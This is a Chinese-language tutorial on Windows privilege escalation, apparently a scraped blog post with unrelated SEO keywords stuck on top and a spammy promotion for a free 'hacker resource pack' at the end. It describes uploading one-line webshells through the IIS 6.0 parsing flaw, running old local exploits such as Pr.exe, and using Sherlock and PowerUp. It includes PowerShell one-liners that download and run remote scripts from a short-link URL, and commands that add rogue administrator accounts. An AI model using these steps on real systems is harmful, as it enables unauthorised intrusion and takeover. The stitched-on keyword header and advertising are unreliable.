北京最新消息今天上海优化排名公司

北京最新消息今天,上海优化排名公司,资金盘网站开发价格,网站建设知识产权问题前言#xff1a; 了解基础知识之后#xff0c;这次就来仔细学一下Windows操作系统的提权。 Windows提权基础 0x00:Windows提权的大致方向 拿到一个低权限时要进行提权#xff0c;首先要清楚从哪里入手#xff0c;清楚了提权的大致方向#xff0c;才能事半功倍。 其中比…前言了解基础知识之后这次就来仔细学一下Windows操作系统的提权。Windows提权基础0x00:Windows提权的大致方向拿到一个低权限时要进行提权首先要清楚从哪里入手清楚了提权的大致方向才能事半功倍。其中比较常见而且利用较多的有内核提权数据库提权应用提权中间人劫持等01:Windows基础提权命令查询系统信息 systeminfo 如果要查看特定的信息可以使用 systeminfo | findstr /B /C:OS名称 /C:OS版本 主机名 Hostname 环境变量 Set 查看用户信息 Net user 查看服务pid号 Tasklist /svc|find TermService netstat -ano|find 3389 查看系统名 wmic os get caption 查看补丁信息 wmic qfe get Description,HotFixID,InstalledOn 如果要定位到特定的补丁可以使用如下命令 wmic qfe get Description,HotFixID,InstalledOn | findstr /C:KB4346084 /C:KB4509094 查看当前安装程序 wmic product get name,version其中需要注意一下环境变量因为有的软件环境变量可能设置在其它路径中而在该路径下的文件是具有写权限的就可以通过替换文件来达到提权操作02:常见所处的权限通常拿到webshell获得的权限如下ASP/PHP 匿名权限 ASPX user权限 jsp 通常是系统权限03:提权的前提条件最重要的就是收集信息了根据收集到的信息再进行响应的攻击。服务器系统和版本位数 服务器的补丁情况 服务器的安装软件情况 服务器的防护软件情况 端口情况收集好信息就可以先从这几个方面入手确定是否能执行命令如果不能调用系统cmd执行命令。 要上传一个cmd.exe 找一个可写可执行的目录 通过查找的补丁信息,找相应的exp提权04:溢出漏洞提权溢出漏洞是一种计算机程序的可更正性缺陷。溢出漏洞的全名缓冲区溢出漏洞 因为它是在程序执行的时候在缓冲区执行的错误代码所以叫缓冲区溢出漏洞。溢出漏洞提权是利用操作系统层漏洞进行权限提升通常步骤是拿到shell后获取目标机器的补丁信息通过目标的补丁情况获取相对应的漏洞进行提权Windows提权实践0x01:Pr提权Pr是windows本地溢出工具主要作用就是可以将低权限用户提升为系统权限主要用于webshell提权补丁号为KB952004虽然Pr提权已经很老了但对于新手去学习提权还是需要去学习一下的接下来就来实践一下Pr提权。一个上传页面使用Wappalyzer分析一下服务器是什么服务器以及网站环境等Web服务器是iis6.0存在中间件解析漏洞可以利用这个漏洞进行上传木马IIS6.0解析漏洞介绍 当建立*.asa、.asp格式的文件夹时其目录下的任意文件都将会被IIS当做asp解析。 当文件.asp;1.jpg IIS6.0同样会将文件作为asp文件解析。上传一个asp一句话木马改下目录和文件后缀上传成功连接成功获得webshell权限先来查看一下当前的用户权限发现菜刀的虚拟终端没办法使用自己上传一个当前的用户权限是并没有创建用户等权限所以接下来就要收集信息了先来查询一下系统信息在系统的补丁中发现没有KB952004因此可以利用这个漏洞进行提权cve-2009-0079上传pr.exe提权成功02:Windows分析工具的利用WinSystemHelperWinSystemHelper检查可利用的漏洞该工具适合在任何Windows服务器上进行已知提权漏洞的检测使用方法: 上传battxt文件运行bat查看结果WinSystemHelper实验环境windows server 2003创建一个iis服务并开启asp支持在wwwroot目录下放一个aspx木马菜刀进行连接连接成功后查看权限权限不高在其他文件夹中上传不了但可以在RECYCLER文件夹中上传文件因为一般情况下这个文件夹都是有权限进行上传的。RECYCLER是windows操作系统中存放被删除文件的文件夹之一根据WinSystemHelper的使用方法在该目录下上传battxt文件。虚拟终端运行一下WinSysHelper.bat有很多可以利用的漏洞找一个11年的exp测试一下直接运行发现成功添加了一个k8team的用户创建的用户已经成功添加到管理员组当中提权成功SherlockSherlock是一个在Windows下用于本地提权的PowerShell脚本https://github.com/rasta-mouse/Sherlock使用方法:本地加载脚本 Import-Module Sherlock.ps1 远程加载脚本 IEX (New-Object System.Net.Webclient).DownloadString(https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1) 检查漏洞 Find-AllVulns 出现Appears Vulnerable就是存在漏洞实验环境win7,搭配有phpstudy先用管理员账号创建一个普通的账号,用户名为test登陆进去在根目录下设置一个php一句话木马进行连接发现无法在虚拟终端执行命令而且自己上传进去的cmd.exe也无法使用这时可以使用另外一款工具phpspy将其中的2011.php文件上传到网站根目录并进行访问密码在源代码中有登陆之后在这里面便可以进行命令执行了接下来在C:/users/test目录下放入Sherlock文件接下来调用下Powershell,这里直接在win7本机做实验了所以使用如下命令powershell.exe -exec bypass启动成功下面本地加载下脚本检查下存在的漏洞Import-Module ./Sherlock.ps1 Find-AllVulns通过这样的分析便可以找到对应的漏洞利用相应的exp即可可以找MS14-058测试一下,上传与操作系统版本相同的exp提权成功Privesc该工具可以枚举出目标Windows系统中常见的Windows错误安全配置错误的安全配置将允许攻击者在目标系统中实现信息收集以及权限提升Privesc使用方法本地加载脚本 Import-Module .\Privesc.psm1 获取函数 Get-Command -Module Privesc 检测全部信息 Invoke-AllChecks 命令行下执行 powershell.exe -exec bypass -Command {Import-Module .\PowerUp.ps1;Invoke-AllChecks} 远程调用执行 powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString(http://dwz.cn/2vkbfp);Invoke-AllChecks 添加用户 Install-ServiceBinary -ServiceName 服务名 -UserName user -Password password先进入Powershell加载脚本并获取函数检测全部信息除此之外可以将信息导入到文件中IEX (New-Object Net.WebClient).DownloadString(http://dwz.cn/2vkbfp);Invoke-AllChecks 1.txt添加一个shy用户密码为123456Install-ServiceBinary -ServiceName phpStudySrv -UserName shy -Password 123456执行成功03:提权实战在测试的网站中上传一个asp木马文件菜刀进行连接当前权限为没有创建用户等权限需要进行提权操作使用命令systeminfo查看一下系统信息当前的操作系统是winserver-2008查到CVE-2018-8120可以对该系统进行提权操作,就将exp文件上传上去但发现网站根目录和垃圾邮箱都无法上传进去但是经过测试后发现可以在User/All Users目录下进行上传exp文件提权成功创建用户成功网络安全学习资源分享:给大家分享一份全套的网络安全学习资料给那些想学习 网络安全的小伙伴们一点帮助对于从来没有接触过网络安全的同学我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线大家跟着这个大的方向学习准没问题。因篇幅有限仅展示部分资料朋友们如果有需要全套《网络安全入门进阶学习资源包》需要点击下方链接即可前往获取读者福利 |CSDN大礼包《网络安全入门进阶学习资源包》免费分享安全链接放心点击1.成长路线图学习规划要学习一门新的技术作为新手一定要先学习成长路线图方向不对努力白费。对于从来没有接触过网络安全的同学我们帮你准备了详细的学习成长路线图学习规划。可以说是最科学最系统的学习路线大家跟着这个大的方向学习准没问题。2.网安入门到进阶视频教程很多朋友都不喜欢晦涩的文字我也为大家准备了视频教程其中一共有21个章节每个章节都是当前板块的精华浓缩。全套教程文末领取哈3.SRC黑客文档大家最喜欢也是最关心的SRC技术文籍黑客技术也有收录SRC技术文籍黑客资料由于是敏感资源这里不能直接展示哦全套教程文末领取哈4.护网行动资料其中关于HW护网行动也准备了对应的资料这些内容可相当于比赛的金手指5.黑客必读书单6.网络安全岗面试题合集当你自学到这里你就要开始思考找工作的事情了而工作绕不开的就是真题和面试题。所有资料共282G朋友们如果有需要全套《网络安全入门进阶学习资源包》可以扫描下方二维码或链接免费领取~读者福利 |CSDN大礼包《网络安全入门进阶学习资源包》免费分享安全链接放心点击